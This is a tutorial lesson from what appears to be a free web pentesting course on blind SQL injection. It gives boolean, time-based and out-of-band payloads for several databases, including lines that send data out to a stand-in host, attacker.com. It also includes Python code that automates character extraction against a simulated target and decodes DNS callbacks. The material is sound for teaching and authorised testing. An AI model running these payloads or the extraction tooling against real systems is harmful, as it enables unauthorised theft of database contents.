Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both · Beginner · 16 modules · 2.7h · 0 enrolled
From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.
Instructor
lazyhackers
Free Course

Curriculum — 5 sections · 16 modules · 2.7h


Blind SQL Injection — When No Data Is Returned

Lesson · 10 min

Blind SQLi occurs when the application is vulnerable but reflects no query output: error messages are suppressed and no column is echoed into the page, so a UNION SELECT gives you nothing to read. Instead you infer data one bit at a time from differences in behaviour: page content (boolean-based), response time (time-based), or a network callback from the database host (out-of-band).

Boolean-Based Blind SQLi

# Establish baseline (URL-encode the spaces as %20 or + when you actually send these):
https://target.com/item?id=1          # Shows product — TRUE state
https://target.com/item?id=1 AND 1=2  # No product — FALSE state

# Ask yes/no questions about the database:
# "Does first character of database name equal 's'?"
https://target.com/item?id=1 AND SUBSTRING(database(),1,1)='s'
# Product shown? YES = first char is 's'. Not shown? Try next letter.

# Extract full DB name character by character
1 AND SUBSTRING(database(),1,1)='s'   # TRUE
1 AND SUBSTRING(database(),2,1)='h'   # TRUE
1 AND SUBSTRING(database(),3,1)='o'   # TRUE
1 AND SUBSTRING(database(),4,1)='p'   # TRUE
# Database name = 'shop'

# More efficient — binary search using ASCII values: each answer halves the remaining
# range, so a printable-ASCII character costs about 7 requests instead of up to 95
1 AND ASCII(SUBSTRING(database(),1,1))>64   # >64? TRUE
1 AND ASCII(SUBSTRING(database(),1,1))>100  # >100? TRUE
1 AND ASCII(SUBSTRING(database(),1,1))>115  # >115? FALSE
1 AND ASCII(SUBSTRING(database(),1,1))=115  # =115? TRUE = 's'

Time-Based Blind SQLi

# No visible difference in response at all? Use time delays.
# "If condition is true, delay 5 seconds" — you measure response time, not content.
# These payloads assume a string context (id='1'); drop the quote for a numeric id.

# ── MySQL ───────────────────────────────────────────
# MySQL's "--" comment needs trailing whitespace; "-- -" survives trimming ("#" also works)
1' AND SLEEP(5)-- -                           # ~5s delay (only if the row matches, AND short-circuits)
1' AND IF(1=1,SLEEP(5),0)-- -                 # Conditional — always true
1' AND IF(database()='shop',SLEEP(5),0)-- -   # Delay if DB name = 'shop'

# ── MSSQL ────────────────────────────────────────────
# Stacked queries: the driver must allow several statements per call
1'; IF (1=1) WAITFOR DELAY '0:0:5'--
1'; IF (DB_NAME()='master') WAITFOR DELAY '0:0:5'--

# ── PostgreSQL ───────────────────────────────────────
1'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
# Without stacked queries, keep it inside the WHERE clause:
1' AND 1=(SELECT 1 FROM pg_sleep(5))--

# ── Oracle ───────────────────────────────────────────
# RECEIVE_MESSAGE returns 1 once the 5s timeout expires, so the comparison becomes true
1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
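The boolean-based extraction loop and its time-based variant, as one added example that is not part of the course or of lazyhackers' material. An in-memory SQLite database stands in for the target because the loop, not the DBMS, is the point: the items table, the secrets table and its value 'shop' are constructed; SQLite has no database(), so the secret is read through a subquery and the lesson's SUBSTRING/ASCII become SQLite's substr()/unicode(); SLEEP() is registered as a user-defined function so the time-based payload keeps the MySQL shape (CASE WHEN cond THEN SLEEP(n) ELSE 0 END). The two oracles, the request counter and the threshold calibration are mine.

```python
"""Boolean- and time-based blind SQLi extraction driven by binary search.

Added example, not from the course page. Everything about the "target"
(tables, the secret value 'shop', the SLEEP() function) is constructed here.
"""
import sqlite3
import time
from typing import Callable, Optional, Tuple

SLEEP_SECONDS = 0.05          # stands in for SLEEP(5); keeps the demo fast
REQUESTS = {"count": 0}       # how many "HTTP requests" the attacker has sent

conn = sqlite3.connect(":memory:")
conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)   # assumed: MySQL-style SLEEP()
conn.executescript("""
CREATE TABLE items(id INTEGER, name TEXT);
INSERT INTO items VALUES (1, 'Widget');
CREATE TABLE secrets(dbname TEXT);
INSERT INTO secrets VALUES ('shop');
""")
SECRET_EXPR = "SELECT dbname FROM secrets"   # plays the role of database()


def vulnerable_item_page(id_param: str) -> Optional[str]:
    """Simulated endpoint: concatenates ?id= straight into the query (the bug)."""
    REQUESTS["count"] += 1
    row = conn.execute(f"SELECT name FROM items WHERE id = {id_param}").fetchone()
    return row[0] if row else None


def vulnerable_timed_page(id_param: str) -> str:
    """Same bug, but the page body never changes: only timing leaks."""
    vulnerable_item_page(id_param)
    return "OK"


# --- oracles: turn one SQL condition into one bit -----------------------------
def boolean_oracle(condition: str) -> bool:
    """TRUE iff the product is still shown with the condition ANDed in."""
    return vulnerable_item_page(f"1 AND ({condition})") is not None


def _timed_request(condition: str) -> float:
    payload = f"1 AND CASE WHEN ({condition}) THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END"
    start = time.perf_counter()
    vulnerable_timed_page(payload)
    return time.perf_counter() - start


BASELINE = _timed_request("1=2")                  # normal latency, no delay
THRESHOLD = BASELINE + SLEEP_SECONDS / 2          # halfway between the two states


def time_oracle(condition: str) -> bool:
    """TRUE iff the response is delayed. A slow answer is re-sent once so a single
    latency spike (network jitter) does not turn into a wrong bit."""
    if _timed_request(condition) < THRESHOLD:
        return False
    return _timed_request(condition) >= THRESHOLD


# --- extraction: binary search on the code point of each character ------------
def extract_char(oracle: Callable[[str], bool], expr: str, pos: int) -> Optional[str]:
    """Recover character `pos` (1-based) of `expr` in at most 8 oracle calls,
    against up to 95 for a linear scan of printable ASCII."""
    if not oracle(f"length(substr(({expr}),{pos},1)) = 1"):
        return None                                # past the end of the value
    lo, hi = 32, 126                               # printable ASCII, inclusive
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Walk the value left to right until the length probe says there is no more."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(oracle, expr, pos)
        if ch is None:
            break
        out += ch
    return out


def run(oracle: Callable[[str], bool]) -> Tuple[str, int]:
    """Return (recovered value, number of requests it cost)."""
    before = REQUESTS["count"]
    value = extract_string(oracle, SECRET_EXPR)
    return value, REQUESTS["count"] - before


if __name__ == "__main__":
    print("boolean:", run(boolean_oracle))
    print("timed:  ", run(time_oracle))
```

Swapping the oracle is the only change between the two techniques; the search is identical. Against a real target replace the two vulnerable_* functions with an HTTP call, measure BASELINE from several requests rather than one, and expect the time-based run to cost roughly twice the requests (every delayed answer is confirmed) and many times the wall-clock time of the boolean one, which is why the lesson reaches for out-of-band channels next.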

Out-of-Band (OOB) SQLi

# When time-based is too slow — use DNS/HTTP callbacks
# Use Burp Collaborator or interactsh for receiving callbacks
# A DNS label holds at most 63 hostname-safe characters: HEX() the value and chunk long ones

# ── MySQL ────────────────────────────────────────────
# Windows-hosted MySQL only (the UNC path is what triggers the DNS lookup) and needs FILE privilege
' UNION SELECT load_file(CONCAT('\\\\',database(),'.attacker.com\\file'))-- -
# DNS lookup reveals: shop.attacker.com = DB name is 'shop'

# ── MSSQL ────────────────────────────────────────────
# Stacked queries required; xp_dirtree resolves the UNC host before listing it
'; EXEC master..xp_dirtree '\\attacker.com\share'--
'; DECLARE @p varchar(1024);SET @p='\\'+db_name()+'.attacker.com\share';EXEC master..xp_dirtree @p--

# ── Oracle ───────────────────────────────────────────
# Both packages need a network ACL grant on 11g+; UTL_INADDR only does a DNS lookup,
# so it still works when outbound HTTP from the database host is blocked
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
' UNION SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.attacker.com') FROM dual--
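The receiving end of the DNS callback, as an added example that is not part of the course and is not code from Burp Collaborator or interactsh; it shows what those listeners do with the query the injected UNC path or URL makes the database host send. The packet is constructed with build_dns_query() rather than captured, and 'attacker.com' is the assumed listener domain taken from the lesson's payloads.

```python
"""Decode the DNS query an out-of-band SQLi payload triggers.

Added example, not from the course page. The query packet is constructed
in-process; a real listener would read it from UDP port 53 on the server
that is authoritative for CALLBACK_DOMAIN.
"""
import struct
from typing import Optional

CALLBACK_DOMAIN = "attacker.com"   # assumed: the domain your listener is authoritative for


def build_dns_query(qname: str, txid: int = 0x1234) -> bytes:
    """Build the A query a resolver sends for qname (used here only to construct sample input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1, one question
    labels = b"".join(bytes([len(l)]) + l.encode("ascii")
                      for l in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def parse_qname(packet: bytes) -> str:
    """Return the question name from a raw DNS query, validating every label length."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    _txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, off = [], 12
    while True:
        if off >= len(packet):
            raise ValueError("truncated question name")
        n = packet[off]
        off += 1
        if n == 0:
            break
        if n > 63:   # 0x40..0xBF are reserved, 0xC0.. are compression pointers: neither is valid here
            raise ValueError("invalid label length in question name")
        if off + n > len(packet):
            raise ValueError("label runs past end of packet")
        labels.append(packet[off:off + n].decode("ascii", errors="replace"))
        off += n
    return ".".join(labels)


def leaked_value(qname: str, domain: str = CALLBACK_DOMAIN) -> Optional[str]:
    """The prefix the injection put in front of the callback domain, or None if the
    query was for something else (resolver noise, the bare domain). Lower-cased
    because DNS is case-insensitive and resolvers may randomise case (0x20 encoding)."""
    q = qname.lower().rstrip(".")
    suffix = "." + domain.lower()
    if not q.endswith(suffix):
        return None
    return q[:-len(suffix)]


def decode_hex_labels(value: str) -> str:
    """Undo HEX()-encoding and label chunking: '73686f.70' -> 'shop'."""
    return bytes.fromhex(value.replace(".", "")).decode("utf-8", errors="replace")


if __name__ == "__main__":
    pkt = build_dns_query("shop.attacker.com")
    print(leaked_value(parse_qname(pkt)))
```

A listener binds UDP 53 on the authoritative nameserver, runs leaked_value(parse_qname(data)) on every datagram and logs the hits with the source address; it need not even answer. Because hostnames cannot carry spaces, quotes or case, HEX() the value in the payload and split anything longer than 63 bytes across labels, then reassemble with decode_hex_labels().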